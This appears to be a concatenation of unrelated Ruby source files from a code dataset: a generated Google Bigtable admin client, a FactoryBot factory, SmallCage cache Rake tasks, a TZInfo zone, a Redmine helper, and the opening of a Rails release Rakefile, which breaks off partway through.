# Pass arguments to `set_iam_policy` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy is being specified.
# See the operation documentation for the appropriate value for this field.
# @param policy [::Google::Iam::V1::Policy, ::Hash]
# REQUIRED: The complete policy to be applied to the `resource`. The size of
# the policy is limited to a few 10s of KB. An empty policy is a
# valid policy but certain Cloud Platform services (such as Projects)
# might reject them.
# @param update_mask [::Google::Protobuf::FieldMask, ::Hash]
# OPTIONAL: A FieldMask specifying which fields of the policy to modify. Only
# the fields in the mask will be modified. If no mask is provided, the
# following default mask is used:
#
# `paths: "bindings, etag"`
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::Policy]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::Policy]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::SetIamPolicyRequest.new
#
# # Call the set_iam_policy method.
# result = client.set_iam_policy request
#
# # The returned object is of type Google::Iam::V1::Policy.
# p result
#
def set_iam_policy request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::SetIamPolicyRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.set_iam_policy.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.resource
header_params["resource"] = request.resource
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.set_iam_policy.timeout,
metadata: metadata,
retry_policy: @config.rpcs.set_iam_policy.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :set_iam_policy, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Returns permissions that the caller has on the specified instance resource.
#
# @overload test_iam_permissions(request, options = nil)
# Pass arguments to `test_iam_permissions` via a request object, either of type
# {::Google::Iam::V1::TestIamPermissionsRequest} or an equivalent Hash.
#
# @param request [::Google::Iam::V1::TestIamPermissionsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload test_iam_permissions(resource: nil, permissions: nil)
# Pass arguments to `test_iam_permissions` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource [::String]
# REQUIRED: The resource for which the policy detail is being requested.
# See the operation documentation for the appropriate value for this field.
# @param permissions [::Array<::String>]
# The set of permissions to check for the `resource`. Permissions with
# wildcards (such as '*' or 'storage.*') are not allowed. For more
# information see
# [IAM Overview](https://cloud.google.com/iam/docs/overview#permissions).
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Iam::V1::TestIamPermissionsResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Iam::V1::TestIamPermissionsResponse]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Iam::V1::TestIamPermissionsRequest.new
#
# # Call the test_iam_permissions method.
# result = client.test_iam_permissions request
#
# # The returned object is of type Google::Iam::V1::TestIamPermissionsResponse.
# p result
#
def test_iam_permissions request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Iam::V1::TestIamPermissionsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.test_iam_permissions.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.resource
header_params["resource"] = request.resource
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.test_iam_permissions.timeout,
metadata: metadata,
retry_policy: @config.rpcs.test_iam_permissions.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :test_iam_permissions, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Lists hot tablets in a cluster, within the time range provided. Hot
# tablets are ordered based on CPU usage.
#
# @overload list_hot_tablets(request, options = nil)
# Pass arguments to `list_hot_tablets` via a request object, either of type
# {::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest} or an equivalent Hash.
#
# @param request [::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g, timeout, retries, etc. Optional.
#
# @overload list_hot_tablets(parent: nil, start_time: nil, end_time: nil, page_size: nil, page_token: nil)
# Pass arguments to `list_hot_tablets` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param parent [::String]
# Required. The cluster name to list hot tablets.
# Value is in the following form:
# `projects/{project}/instances/{instance}/clusters/{cluster}`.
# @param start_time [::Google::Protobuf::Timestamp, ::Hash]
# The start time to list hot tablets. The hot tablets in the response will
# have start times between the requested start time and end time. Start time
# defaults to Now if it is unset, and end time defaults to Now - 24 hours if
# it is unset. The start time should be less than the end time, and the
# maximum allowed time range between start time and end time is 48 hours.
# Start time and end time should have values between Now and Now - 14 days.
# @param end_time [::Google::Protobuf::Timestamp, ::Hash]
# The end time to list hot tablets.
# @param page_size [::Integer]
# Maximum number of results per page.
#
# A page_size that is empty or zero lets the server choose the number of
# items to return. A page_size which is strictly positive will return at most
# that many items. A negative page_size will cause an error.
#
# Following the first request, subsequent paginated calls do not need a
# page_size field. If a page_size is set in subsequent calls, it must match
# the page_size given in the first request.
# @param page_token [::String]
# The value of `next_page_token` returned by a previous call.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::HotTablet>]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Gapic::PagedEnumerable<::Google::Cloud::Bigtable::Admin::V2::HotTablet>]
#
# @raise [::Google::Cloud::Error] if the RPC is aborted.
#
# @example Basic example
# require "google/cloud/bigtable/admin/v2"
#
# # Create a client object. The client can be reused for multiple calls.
# client = Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new
#
# # Create a request. To set request fields, pass in keyword arguments.
# request = Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest.new
#
# # Call the list_hot_tablets method.
# result = client.list_hot_tablets request
#
# # The returned object is of type Gapic::PagedEnumerable. You can
# # iterate over all elements by calling #each, and the enumerable
# # will lazily make API calls to fetch subsequent pages. Other
# # methods are also available for managing paging directly.
# result.each do |response|
# # Each element is of type ::Google::Cloud::Bigtable::Admin::V2::HotTablet.
# p response
# end
#
def list_hot_tablets request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Cloud::Bigtable::Admin::V2::ListHotTabletsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.list_hot_tablets.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Cloud::Bigtable::Admin::V2::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {}
if request.parent
header_params["parent"] = request.parent
end
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.list_hot_tablets.timeout,
metadata: metadata,
retry_policy: @config.rpcs.list_hot_tablets.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@bigtable_instance_admin_stub.call_rpc :list_hot_tablets, request, options: options do |response, operation|
response = ::Gapic::PagedEnumerable.new @bigtable_instance_admin_stub, :list_hot_tablets, request, response, operation, options
yield response, operation if block_given?
return response
end
rescue ::GRPC::BadStatus => e
raise ::Google::Cloud::Error.from_error(e)
end
##
# Configuration class for the BigtableInstanceAdmin API.
#
# This class represents the configuration for BigtableInstanceAdmin,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # create_instance to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.create_instance.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Cloud::Bigtable::Admin::V2::BigtableInstanceAdmin::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.create_instance.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"bigtableadmin.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentails object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "bigtableadmin.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client, nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the BigtableInstanceAdmin API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `create_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :create_instance
##
# RPC-specific configuration for `get_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :get_instance
##
# RPC-specific configuration for `list_instances`
# @return [::Gapic::Config::Method]
#
attr_reader :list_instances
##
# RPC-specific configuration for `update_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :update_instance
##
# RPC-specific configuration for `partial_update_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :partial_update_instance
##
# RPC-specific configuration for `delete_instance`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_instance
##
# RPC-specific configuration for `create_cluster`
# @return [::Gapic::Config::Method]
#
attr_reader :create_cluster
##
# RPC-specific configuration for `get_cluster`
# @return [::Gapic::Config::Method]
#
attr_reader :get_cluster
##
# RPC-specific configuration for `list_clusters`
# @return [::Gapic::Config::Method]
#
attr_reader :list_clusters
##
# RPC-specific configuration for `update_cluster`
# @return [::Gapic::Config::Method]
#
attr_reader :update_cluster
##
# RPC-specific configuration for `partial_update_cluster`
# @return [::Gapic::Config::Method]
#
attr_reader :partial_update_cluster
##
# RPC-specific configuration for `delete_cluster`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_cluster
##
# RPC-specific configuration for `create_app_profile`
# @return [::Gapic::Config::Method]
#
attr_reader :create_app_profile
##
# RPC-specific configuration for `get_app_profile`
# @return [::Gapic::Config::Method]
#
attr_reader :get_app_profile
##
# RPC-specific configuration for `list_app_profiles`
# @return [::Gapic::Config::Method]
#
attr_reader :list_app_profiles
##
# RPC-specific configuration for `update_app_profile`
# @return [::Gapic::Config::Method]
#
attr_reader :update_app_profile
##
# RPC-specific configuration for `delete_app_profile`
# @return [::Gapic::Config::Method]
#
attr_reader :delete_app_profile
##
# RPC-specific configuration for `get_iam_policy`
# @return [::Gapic::Config::Method]
#
attr_reader :get_iam_policy
##
# RPC-specific configuration for `set_iam_policy`
# @return [::Gapic::Config::Method]
#
attr_reader :set_iam_policy
##
# RPC-specific configuration for `test_iam_permissions`
# @return [::Gapic::Config::Method]
#
attr_reader :test_iam_permissions
##
# RPC-specific configuration for `list_hot_tablets`
# @return [::Gapic::Config::Method]
#
attr_reader :list_hot_tablets
# @private
def initialize parent_rpcs = nil
create_instance_config = parent_rpcs.create_instance if parent_rpcs.respond_to? :create_instance
@create_instance = ::Gapic::Config::Method.new create_instance_config
get_instance_config = parent_rpcs.get_instance if parent_rpcs.respond_to? :get_instance
@get_instance = ::Gapic::Config::Method.new get_instance_config
list_instances_config = parent_rpcs.list_instances if parent_rpcs.respond_to? :list_instances
@list_instances = ::Gapic::Config::Method.new list_instances_config
update_instance_config = parent_rpcs.update_instance if parent_rpcs.respond_to? :update_instance
@update_instance = ::Gapic::Config::Method.new update_instance_config
partial_update_instance_config = parent_rpcs.partial_update_instance if parent_rpcs.respond_to? :partial_update_instance
@partial_update_instance = ::Gapic::Config::Method.new partial_update_instance_config
delete_instance_config = parent_rpcs.delete_instance if parent_rpcs.respond_to? :delete_instance
@delete_instance = ::Gapic::Config::Method.new delete_instance_config
create_cluster_config = parent_rpcs.create_cluster if parent_rpcs.respond_to? :create_cluster
@create_cluster = ::Gapic::Config::Method.new create_cluster_config
get_cluster_config = parent_rpcs.get_cluster if parent_rpcs.respond_to? :get_cluster
@get_cluster = ::Gapic::Config::Method.new get_cluster_config
list_clusters_config = parent_rpcs.list_clusters if parent_rpcs.respond_to? :list_clusters
@list_clusters = ::Gapic::Config::Method.new list_clusters_config
update_cluster_config = parent_rpcs.update_cluster if parent_rpcs.respond_to? :update_cluster
@update_cluster = ::Gapic::Config::Method.new update_cluster_config
partial_update_cluster_config = parent_rpcs.partial_update_cluster if parent_rpcs.respond_to? :partial_update_cluster
@partial_update_cluster = ::Gapic::Config::Method.new partial_update_cluster_config
delete_cluster_config = parent_rpcs.delete_cluster if parent_rpcs.respond_to? :delete_cluster
@delete_cluster = ::Gapic::Config::Method.new delete_cluster_config
create_app_profile_config = parent_rpcs.create_app_profile if parent_rpcs.respond_to? :create_app_profile
@create_app_profile = ::Gapic::Config::Method.new create_app_profile_config
get_app_profile_config = parent_rpcs.get_app_profile if parent_rpcs.respond_to? :get_app_profile
@get_app_profile = ::Gapic::Config::Method.new get_app_profile_config
list_app_profiles_config = parent_rpcs.list_app_profiles if parent_rpcs.respond_to? :list_app_profiles
@list_app_profiles = ::Gapic::Config::Method.new list_app_profiles_config
update_app_profile_config = parent_rpcs.update_app_profile if parent_rpcs.respond_to? :update_app_profile
@update_app_profile = ::Gapic::Config::Method.new update_app_profile_config
delete_app_profile_config = parent_rpcs.delete_app_profile if parent_rpcs.respond_to? :delete_app_profile
@delete_app_profile = ::Gapic::Config::Method.new delete_app_profile_config
get_iam_policy_config = parent_rpcs.get_iam_policy if parent_rpcs.respond_to? :get_iam_policy
@get_iam_policy = ::Gapic::Config::Method.new get_iam_policy_config
set_iam_policy_config = parent_rpcs.set_iam_policy if parent_rpcs.respond_to? :set_iam_policy
@set_iam_policy = ::Gapic::Config::Method.new set_iam_policy_config
test_iam_permissions_config = parent_rpcs.test_iam_permissions if parent_rpcs.respond_to? :test_iam_permissions
@test_iam_permissions = ::Gapic::Config::Method.new test_iam_permissions_config
list_hot_tablets_config = parent_rpcs.list_hot_tablets if parent_rpcs.respond_to? :list_hot_tablets
@list_hot_tablets = ::Gapic::Config::Method.new list_hot_tablets_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
| 55.567274 | 156 | 0.552663 |
bb7242c1e15e7375fb028403371732906a0e02f2 | 266 | FactoryBot.define do
factory :api_v3_ind_context_property, class: 'Api::V3::IndContextProperty' do
association :ind, factory: :api_v3_ind
association :context, factory: :api_v3_context
tooltip_text { 'Context specific tooltip text for IND' }
end
end
| 33.25 | 79 | 0.759398 |
bb40d5438e7a788eab1966cdcb0c0c0fa8b6f781 | 1,611 | namespace :cache do
desc "Delete all cache files."
task :clean => :require do
pat = SmallCage::CacheFilter::TARGET_PATTERN
list = FileList[pat]
list.each do |path|
to = path.pathmap("%{--latest$,-*}X%x")
outfiles = FileList[to]
outfiles = SmallCage::CacheFilter.outfiles(path, outfiles)
outfiles.each do |f|
puts "(cache)D #{f[0]}"
File.delete(f[0])
end
end
end
desc "Delete old cache files."
task :delete_old => :require do
pat = SmallCage::CacheFilter::TARGET_PATTERN
list = FileList[pat]
list.each do |path|
to = path.pathmap("%{--latest$,-*}X%x")
outfiles = FileList[to]
outfiles = SmallCage::CacheFilter.outfiles(path, outfiles)
outfiles.pop
outfiles.each do |f|
puts "(cache)D #{f[0]}"
File.delete(f[0])
end
end
end
task :require do
require File.dirname(__FILE__) + "/../filters/cache_filter.rb"
end
desc "Update *--latest.* files."
task :update => [:require] do
pat = SmallCage::CacheFilter::TARGET_PATTERN
# Fix filenames. (site--latest.css.smc -> site--latest.css -> site-123.css)
smclist = FileList["#{pat}.smc"]
system "smc update" unless smclist.empty?
list = FileList[pat]
SmallCage::CacheFilter.create_cache(list, ENV["DRYRUN"])
# Apply cache filter. Rewrite links. (site--latest.css.smc -> site--latest.css)
system "smc update"
# Copy updated file (site--latest.css -> site-123.css)
smclist = smclist.map {|f| f[0 .. -5]}
SmallCage::CacheFilter.create_cache(smclist, ENV["DRYRUN"])
end
end | 29.290909 | 83 | 0.624457 |
ffa20b63779cf9430e47cab8a2a6444326805d58 | 700 | # encoding: UTF-8
module TZInfo
module Definitions
module Antarctica
module Davis
include TimezoneDefinition
timezone 'Antarctica/Davis' do |tz|
tz.offset :o0, 0, 0, :zzz
tz.offset :o1, 25200, 0, :DAVT
tz.offset :o2, 18000, 0, :DAVT
tz.transition 1957, 1, :o1, 4871703, 2
tz.transition 1964, 10, :o0, 58528805, 24
tz.transition 1969, 2, :o1, 4880507, 2
tz.transition 2009, 10, :o2, 1255806000
tz.transition 2010, 3, :o1, 1268251200
tz.transition 2011, 10, :o2, 1319742000
tz.transition 2012, 2, :o1, 1329854400
end
end
end
end
end
| 26.923077 | 51 | 0.56 |
f8bcadabcaab0115bee569a363a32b3d6b2ea21a | 117 | # frozen_string_literal: true
require_relative 'string_template/handler'
require_relative 'string_template/railtie'
| 23.4 | 42 | 0.863248 |
b9cfc0fa763ea80457037cb461f115468453c24d | 1,284 | require 'spec_helper'
require 'ionoscloud_backupunit_get'
Chef::Knife::IonoscloudBackupunitGet.load_deps
describe Chef::Knife::IonoscloudBackupunitGet do
before :each do
subject { Chef::Knife::IonoscloudBackupunitGet.new }
allow(subject).to receive(:puts)
allow(subject).to receive(:print)
end
describe '#run' do
it 'should call BackupUnitApi.backupunits_find_by_id' do
backupunit = backupunit_mock
subject_config = {
ionoscloud_username: 'email',
ionoscloud_password: 'password',
backupunit_id: backupunit.id,
yes: true,
}
subject_config.each { |key, value| subject.config[key] = value }
check_backupunit_print(subject, backupunit)
expect(subject.api_client).not_to receive(:wait_for)
mock_call_api(
subject,
[
{
method: 'GET',
path: "/backupunits/#{backupunit.id}",
operation: :'BackupUnitApi.backupunits_find_by_id',
return_type: 'BackupUnit',
result: backupunit,
},
],
)
expect { subject.run }.not_to raise_error(Exception)
end
it 'should not make any call if any required option is missing' do
check_required_options(subject)
end
end
end
| 25.68 | 70 | 0.644081 |
4abde3737637d804f64d7381be807319aef808ff | 3,817 | module ExternalRelationItemsHelper
def relative_app_name
Redmine::Utils.relative_url_root.gsub(%r{^\/}, '')
end
def app_id_to_name(app_id)
if app_id == 1
app_name = relative_app_name()
else
app_name = ExternalRelationApp.find_by_id(app_id).app_name
end
app_name
end
def app_name_to_id(app_name)
if app_name == relative_app_name()
app_id = 1
else
app = ExternalRelationApp.find_by(app_name: app_name)
if app.nil?
app_id = 0
else
app_id = app.id
end
end
app_id
end
def app_id_to_title(app_id)
ExternalRelationApp.find_by_id(app_id).app_title
end
def get_table_from_another_app(app_name, params={}, symbolize=true)
require 'json'
require 'net/http'
require 'uri'
uri = URI(
request.protocol + request.host +
"/#{app_name}" + "/external_relations/items.json")
uri.query = params.to_param if params.length > 0
response = Net::HTTP.get_response(uri)
if response.code == '200'
return JSON.parse(response.body, symbolize_names: symbolize)
else
return nil
end
end
def get_table_from_another_apps(params={}, symbolize=true)
another_app_tables = {}
app_names = ExternalRelationApp.all.map{
|e| e.attributes.values
}.transpose[1][1..-1] # get array of app_name except for local
app_names.each do |app_name|
another_app_tables[app_name] = get_table_from_another_app(app_name, params, symbolize)
end
return another_app_tables
end
def abs_local_app_name(ex_rel_array)
ex_rel_array.keys.each { |app_name|
ex_rel_array[app_name].each { |items|
items[:issue_from_app_name] = app_name if items[:issue_from_app_id] == 1
items[:issue_to_app_name] = app_name if items[:issue_to_app_id] == 1
}
}
return ex_rel_array
end
def exchange_app_id(hash, app_name)
id = app_name_to_id(app_name)
return hash.each {|item|
if item[:issue_to_app_id] == 1
item[:issue_to_app_id] = id
item[:issue_to_app_name] = app_name
end
item[:issue_from_app_id] = 1 # local
}
end
def merge_another_table_hash(table_base, table_another)
table_new = table_base
table_another.keys.each{ |app_name|
table_new = table_new + exchange_app_id(table_another[app_name], app_name)
}
return table_new
end
def active_record_to_array_hash(active_record, symbolize=true)
if symbolize
return active_record.map{|e| e.attributes.symbolize_keys}
else
return active_record.map{|e| e.attributes}
end
end
def check_table(table_another)
logger.info(table_another)
table_another.keys.each{ |app_name|
return false if table_another[app_name].nil?
}
return true
end
def delete_item(ex_rel)
issue_to_app_name = app_id_to_name(ex_rel.issue_to_app_id)
issue_to_id = ex_rel.issue_to_id
deleted = ex_rel.destroy
if deleted
# update done_ratio in link_to issues
Thread.start do
call_update_issue_done_ratios(issue_to_app_name, [issue_to_id])
end
end
return deleted
end
def exrels_tabs
tabs = []
tabs << {
:name => 'link_to',
:label => :label_title_ex_rels_issue_to,
:partial => 'issues/tabs/exrels_table_to'}
tabs << {
:name => 'link_from',
:label => :label_title_ex_rels_issue_from,
:partial => 'issues/tabs/exrels_table_from'}
tabs
end
def link_to_break(ex_rel, data_type)
link_to '',
{ controller: 'external_relation_items', action: :destroy,
id: ex_rel[:id], ex_rel: ex_rel, data_type: data_type },
method: :delete, remote: true, class: 'icon icon-link-break',
data: { confirm: l(:text_are_you_sure) }, title: l(:label_link_break)
end
end
| 26.506944 | 92 | 0.674614 |
4a1ed04478acb328e80a89e9769ec3a891856ecd | 5,872 | FRAMEWORKS = %w( activesupport activemodel activerecord actionview actionpack activejob actionmailer actioncable railties )
root = File.expand_path('../../', __FILE__)
version = File.read("#{root}/RAILS_VERSION").strip
tag = "v#{version}"
directory "pkg"
(FRAMEWORKS + ['rails']).each do |framework|
namespace framework do
gem = "pkg/#{framework}-#{version}.gem"
gemspec = "#{framework}.gemspec"
task :clean do
rm_f gem
end
task :update_versions do
glob = root.dup
if framework == "rails"
glob << "/version.rb"
else
glob << "/#{framework}/lib/*"
glob << "/gem_version.rb"
end
file = Dir[glob].first
ruby = File.read(file)
major, minor, tiny, pre = version.split('.', 4)
pre = pre ? pre.inspect : "nil"
ruby.gsub!(/^(\s*)MAJOR(\s*)= .*?$/, "\\1MAJOR = #{major}")
raise "Could not insert MAJOR in #{file}" unless $1
ruby.gsub!(/^(\s*)MINOR(\s*)= .*?$/, "\\1MINOR = #{minor}")
raise "Could not insert MINOR in #{file}" unless $1
ruby.gsub!(/^(\s*)TINY(\s*)= .*?$/, "\\1TINY = #{tiny}")
raise "Could not insert TINY in #{file}" unless $1
ruby.gsub!(/^(\s*)PRE(\s*)= .*?$/, "\\1PRE = #{pre}")
raise "Could not insert PRE in #{file}" unless $1
File.open(file, 'w') { |f| f.write ruby }
if File.exist?("#{framework}/package.json")
Dir.chdir("#{framework}") do
# This "npm-ifies" the current version
# With npm, versions such as "5.0.0.rc1" or "5.0.0.beta1.1" are not compliant with its
# versioning system, so they must be transformed to "5.0.0-rc1" and "5.0.0-beta1-1" respectively.
# In essence, the code below runs through all "."s that appear in the version,
# and checks to see if their index in the version string is greater than or equal to 2,
# and if so, it will change the "." to a "-".
# Sample version transformations:
# irb(main):001:0> version = "5.0.1.1"
# => "5.0.1.1"
# irb(main):002:0> version.gsub(/\./).with_index { |s, i| i >= 2 ? '-' : s }
# => "5.0.1-1"
# irb(main):003:0> version = "5.0.0.rc1"
# => "5.0.0.rc1"
# irb(main):004:0> version.gsub(/\./).with_index { |s, i| i >= 2 ? '-' : s }
# => "5.0.0-rc1"
version = version.gsub(/\./).with_index { |s, i| i >= 2 ? '-' : s }
# Check if npm is installed, and raise an error if not
if sh 'which npm'
sh "npm version #{version} --no-git-tag-version"
else
raise 'You must have npm installed to release Rails.'
end
end
end
end
task gem => %w(update_versions pkg) do
cmd = ""
cmd << "cd #{framework} && " unless framework == "rails"
cmd << "bundle exec rake package && " unless framework == "rails"
cmd << "gem build #{gemspec} && mv #{framework}-#{version}.gem #{root}/pkg/"
sh cmd
end
task :build => [:clean, gem]
task :install => :build do
sh "gem install --pre #{gem}"
end
task :push => :build do
sh "gem push #{gem}"
sh "npm publish" if File.exist?("#{framework}/package.json")
end
end
end
namespace :changelog do
task :header do
(FRAMEWORKS + ['guides']).each do |fw|
require 'date'
fname = File.join fw, 'CHANGELOG.md'
